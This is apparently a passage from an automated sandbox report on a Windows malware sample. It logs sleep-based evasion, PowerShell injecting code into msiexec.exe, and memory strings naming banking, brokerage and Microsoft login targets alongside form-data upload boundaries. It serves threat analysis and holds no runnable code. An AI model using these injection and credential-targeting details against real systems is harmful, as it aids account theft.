            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188Thread sleep time: -598781s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188Thread sleep time: -598672s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188Thread sleep time: -598563s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188Thread sleep time: -598453s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188Thread sleep time: -598344s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188Thread sleep time: -598234s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188Thread sleep time: -598125s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188Thread sleep time: -598016s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188Thread sleep time: -597906s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188Thread sleep time: -597797s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188Thread sleep time: -597688s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188Thread sleep time: -597563s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188Thread sleep time: -597438s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188Thread sleep time: -597313s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188Thread sleep time: -597202s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188Thread sleep time: -596953s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188Thread sleep time: -596724s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188Thread sleep time: -596370s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188Thread sleep time: -596248s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188Thread sleep time: -596137s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188Thread sleep time: -596031s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188Thread sleep time: -595922s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188Thread sleep time: -595813s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188Thread sleep time: -595688s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188Thread sleep time: -595578s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188Thread sleep time: -595469s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188Thread sleep time: -595344s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188Thread sleep time: -595235s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188Thread sleep time: -595110s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188Thread sleep time: -594990s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188Thread sleep time: -594860s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188Thread sleep time: -594735s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188Thread sleep time: -594610s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188Thread sleep time: -594485s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188Thread sleep time: -594360s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188Thread sleep time: -594235s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188Thread sleep time: -594110s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188Thread sleep time: -593985s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188Thread sleep time: -593860s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188Thread sleep time: -593735s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188Thread sleep time: -593491s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188Thread sleep time: -593365s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188Thread sleep time: -593213s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188Thread sleep time: -593068s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188Thread sleep time: -592938s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\r5yYt97sfB.exeCode function: 1_2_00405974 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,1_2_00405974
            Source: C:\Users\user\Desktop\r5yYt97sfB.exeCode function: 1_2_004064C6 FindFirstFileW,FindClose,1_2_004064C6
            Source: C:\Users\user\Desktop\r5yYt97sfB.exeCode function: 1_2_004027FB FindFirstFileW,1_2_004027FB
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599875Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599766Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599656Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599547Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599436Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599328Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599216Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599109Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599000Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598891Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598781Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598672Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598563Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598453Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598344Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598234Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598125Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598016Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597906Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597797Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597688Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597563Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597438Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597313Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597202Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596953Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596724Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596370Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596248Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596137Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596031Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595922Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595813Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595688Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595578Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595469Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595344Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595235Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595110Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594990Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594860Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594735Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594610Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594485Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594360Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594235Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594110Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 593985Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 593860Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 593735Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 593491Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 593365Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 593213Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 593068Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 592938Jump to behavior
            Source: msiexec.exe, 0000000B.00000002.3828910007.0000000026FC0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
            Source: msiexec.exe, 0000000B.00000002.3828910007.0000000026FC0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
            Source: ModuleAnalysisCache.5.drBinary or memory string: Remove-NetEventVmNetworkAdapter
            Source: msiexec.exe, 0000000B.00000002.3828910007.0000000026FC0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
            Source: msiexec.exe, 0000000B.00000002.3828910007.0000000026FC0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
            Source: msiexec.exe, 0000000B.00000002.3828910007.0000000026FC0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
            Source: msiexec.exe, 0000000B.00000002.3828910007.0000000026FC0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696492231s
            Source: msiexec.exe, 0000000B.00000002.3828910007.0000000026FC0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
            Source: msiexec.exe, 0000000B.00000002.3828910007.0000000026FC0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696492231
            Source: msiexec.exe, 0000000B.00000002.3828910007.0000000026FC0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696492231
            Source: msiexec.exe, 0000000B.00000002.3828910007.0000000026FC0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
            Source: msiexec.exe, 0000000B.00000002.3814361627.000000000A17B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: msiexec.exe, 0000000B.00000002.3828910007.0000000026FC0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
            Source: msiexec.exe, 0000000B.00000002.3828910007.0000000026FC0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
            Source: msiexec.exe, 0000000B.00000002.3828910007.0000000026FC0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
            Source: msiexec.exe, 0000000B.00000002.3828910007.0000000026FC0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696492231t
            Source: msiexec.exe, 0000000B.00000002.3814361627.000000000A17B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SeE
            Source: ModuleAnalysisCache.5.drBinary or memory string: Get-NetEventVmNetworkAdapter
            Source: msiexec.exe, 0000000B.00000002.3828910007.0000000026FC0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
            Source: msiexec.exe, 0000000B.00000002.3814361627.000000000A11A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
            Source: msiexec.exe, 0000000B.00000002.3828910007.0000000026FC0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696492231f
            Source: msiexec.exe, 0000000B.00000002.3827428231.0000000025F02000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd3255c2e76ef6<
            Source: msiexec.exe, 0000000B.00000002.3827428231.0000000025EEE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd32380b8cca17<
            Source: msiexec.exe, 0000000B.00000002.3828910007.0000000026FC0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696492231
            Source: msiexec.exe, 0000000B.00000002.3828910007.0000000026FC0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696492231j
            Source: msiexec.exe, 0000000B.00000002.3828910007.0000000026FC0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
            Source: msiexec.exe, 0000000B.00000002.3828910007.0000000026FC0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
            Source: msiexec.exe, 0000000B.00000002.3828910007.0000000026FC0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696492231x
            Source: msiexec.exe, 0000000B.00000002.3828910007.0000000026FC0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
            Source: ModuleAnalysisCache.5.drBinary or memory string: Add-NetEventVmNetworkAdapter
            Source: msiexec.exe, 0000000B.00000002.3828910007.0000000026FC0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696492231o
            Source: msiexec.exe, 0000000B.00000002.3828910007.0000000026FC0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
            Source: msiexec.exe, 0000000B.00000002.3828910007.0000000026FC0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
            Source: msiexec.exe, 0000000B.00000002.3828910007.0000000026FC0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
            Source: msiexec.exe, 0000000B.00000002.3828910007.0000000026FC0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696492231
            Source: msiexec.exe, 0000000B.00000002.3828910007.0000000026FC0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696492231t
            Source: msiexec.exe, 0000000B.00000002.3828910007.0000000026FC0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
            Source: msiexec.exe, 0000000B.00000002.3828910007.0000000026FC0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
            Source: msiexec.exe, 0000000B.00000002.3828910007.0000000026FC0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
            Source: C:\Users\user\Desktop\r5yYt97sfB.exeAPI call chain: ExitProcess graph end nodegraph_1-3613
            Source: C:\Users\user\Desktop\r5yYt97sfB.exeAPI call chain: ExitProcess graph end nodegraph_1-3605
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_02DCD044 LdrInitializeThunk,LdrInitializeThunk,11_2_02DCD044
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess token adjusted: DebugJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 4290000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
